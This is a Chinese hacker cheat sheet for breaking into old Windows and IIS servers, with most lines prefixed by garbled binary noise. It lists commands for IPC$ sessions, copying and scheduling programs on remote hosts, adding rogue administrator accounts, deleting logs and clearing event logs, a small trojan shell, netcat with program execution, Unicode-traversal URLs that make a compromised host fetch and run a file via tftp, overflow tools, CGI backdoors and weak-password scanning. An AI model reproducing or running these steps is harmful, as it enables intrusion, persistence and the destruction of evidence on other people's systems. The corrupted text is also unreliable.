网管和黑客都必须知道的命令
f"�^G�\�� 常用的几条NET命令:
�?��_�S�f D$k<<dvv� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
>:�5^4/fo* Vs>/�q�:I (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
<sX�m���k{ w&6c`az�8 (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
EBF608nWfW ��$i#
1<Qj (查看远程主机时间) net time \\IP地址
|
C�Nsa���
OC0dA�xq� (定时启动某个程序) at \\IP地址 02:18 readme.exe
8)(<��U/�� 1.+w&Y5�
� (查看共享) net view \\IP地址
vN=bd�7^?= rL+K Sb��� (查看netbios工作组列表) nbtstat -A IP地址
N��ZUQ
R`5 S<R�J�4��6 (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
�c�;M7�[y& K \?b6�;ea (这两条把自己增加到管理员组): net user 用户名 密码 /add
vj��?��v7� ^1d"��Rqtv net localgroup Administrators 用户名 /add
QBi&Q%p�iy 5�k�&tRg�� (断开连接) net use \\IP地址\ipc$ /delete
+AP��f[ZpU I�]S�8:w![ 扫尾:
[3Q�u @;"& mDn*��v(
f del C:\winnt\system32\logfiles\*.*
Bq}p]�R3�X �l}|Kk�W\y del C:\winnt\ssytem32\config\*.evt
J�ryC�L]� �$@8$_g|Wz del C:\winnt\system32\dtclog\*.*
�I�f�t @/A WU}?�8\?U% del C:\winnt\system32\*.log
�\Qa�6mt2h l�YZ5FacqC del C:\winnt\system32\*.txt
CuE>=y-�"I .�gmN�E$d� del C:\winnt\*.txt
J�N5<=x5r� 6mH0|:CsY� del C:\winnt\*.log
7nh,j <~;2 aOWE\I�c�8 一、netsvc.exe
!�E�\x�n^� �2Lp��J�xV 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
� Z��zDE�� �7C7eX�J9q netsvc /list \\IP地址
rh�;@|/<l� ��u&Ze$z� netsvc schedule \\IP地址 /query
#lA�8yWxr� &�w{"�"'� netsvc \\IP地址 schedule /start
kYxb@Zn=|� c*�+yJNm3> 二、OpenTelnet.exe
&_Py{Cv@Dw 'B�E &�l�W 远程启动主机的Telnet服务,并绑定端口到7878,例如:
{V�z.|
a[T o�H����/�6 OpenTelnet \\IP地址 用户名 密码 1 7878
j(j ��o8�� ;F)�g���r 然后就可以telnet到主机的7878端口,进入DOS方式下:
'jv[Gcss3L ��e�T?��?F telnet IP地址 7878
vB0O3��]� �'qRK6}"T
三、winshell.exe
>�U�T�A��k �RfP>V/jy5 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
Vc!` Bi�H� �0Xmp)_vba p Path (查看winshell主程序的路径信息)
!���2d�A8b a}�N m;�5K b reBoot (重新启动机器)
�u!in>��]^ /|{Y��ot
e d shutDown (关闭机器)
y=!"++T]B< p1B~:�9y9X s Shell (执行后你就会看到可爱的“C:\>”)
]<z4p'F1% [d��a��,SM x eXit (退出本次登录会话,此命令并不终止winshell的运行)
1(�V>8�}zn B7"/�K]dR: CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�?`�+46U% P.b����Bu 四、3389登陆器,GUI方式登录远程主机的
cnm&o�C� 6 ���:Mz$~o< 五、elsave.exe
S�1�Q�2<<[ �\79�KU��� 事件日志清除工具
�vo�Rr9E*n k�z�]v�XJ elsave -s \\IP地址 -l "application" -C
z@��E-p�YV �pD�r�%�uL elsave -s \\IP地址 -l "system" -C
%U]_1"d,<\ ��]d#Lf�go elsave -s \\IP地址 -l "security" -C
3`@al�hD'� �(eS/Q%ZGK 执行后成功清除应用程序日志,系统日志,安全日志
Kj�R��^6v� w*.q t<rH) 六、hbulot.exe
Yk�'�,a$.S >t2�E034_� 开启win2kserver和winxp的3389服务
2y�e^mJ17� w3�lR8R]�� hbulot [/r]
��5IeF |#g �2m��S3gk� 使用/r表示安装完成后自动重起目标使设置生效。
�e�%VJ�:Dj � <b7��4�L 七、nc.exe(netcat.exe)
��et|P5%�G �=j[�zM�O 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
!�a&@y�#�x �fm2,Mx6�� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
5�>.�)7D%� [uxhdR`�T 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
�wT?.Mt�e� G�)28��#aH 参数:
�$YvT*
T$_ �8zew8I~s
-e prog 程序重定向,一旦连接,就执行 [危险!!]
G%N/]�]l�l BXgAoh�g�! -g gateway source-routing hop point[s], up to 8
�/E'�c���y +Re�xQE�� -G num source-routing pointer: 4, 8, 12, ...
x2B~1�edf
�S�bub��| -h 帮助信息
�#��W#GI"K �;A�b`�b1B -i secs 延时的间隔
*ayn<Vlh`^ mQt'�;|X�@ -l 监听模式,用于入站连接
$Xf1|!W%a% �6x KbK�1W -n 指定数字的IP地址,不能用hostname
}>vf�(9sF` wD�>t�R
SW -o file 记录16进制的传输
S��X)giQLU c)8V^7�=�Q -p port 本地端口号
&0*l=!:G^� �3ThCY���` -r 任意指定本地及远程端口
7
}`c:�u~j qJ��QE|VM& -s addr 本地源地址
�|B&K�T�� �G5W6P7-<X -u UDP模式
U�eB8|�z� }5��gAx�R, -v 详细输出——用两个-v可得到更详细的内容
ZbTU1Y/'
� *z4n�2"�<l -w secs timeout的时间
qM
F'��&� '$u3i
#.�\ -z 将输入输出关掉——用于扫描时
�1So�x�@Ko 八、TFTPD32.EXE
�E@\�e37�e �,eq[�X\B> 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
+5Z0�-�N@ o�)'��u�%m http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
$ wGD�k��� LO@.aJp�p
然后可以直接令文件运行:
%Kd��&�A�* 5T,�Doxo�� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
Eq-fR~�<�9 grEmp9Q ? 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
lyiBRMiP|� 4�fBg��mL� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
�Iu6KW��:x "�'�H$YhY] 一、一 Xscan命令行运行参数说明:
J�u�$=��Tn `Z]�Tp�1�U 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
F�UzIuz �6 �&fA`Od6l" 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
sZFI�Q)�b9 F��/9�]{�H xscan -file <主机列表文件名> <检测项目> [其他选项]
b_Ns�
Ch3@ ���-js�NAQ 其中<检测项目> 含义如下:
fLK*rK^�{" a5WVDh,�cR -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
vT�N/�ho,H Saa#�Mj`M -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
�\��dj&4u3 PT4Xr=�z = -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
l�J@2��N$w <tK��6+isc -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
C�B�x�1.xL H=]$9ZH�!� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
"~x\b�SY <{m!.9g9�� [其他选项] 含义如下:
4s/4z@�3�a �^
ab�%Mbb -v: 显示详细扫描进度
u`Djle�� �V��Ky:e�. -p: 跳过Ping不通的主机
B�`�Og�gdE 9Ue3�
%?~c -o: 跳过没有检测到开放端口的主机
1 GUF,A+_O r$=MB�e��T -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
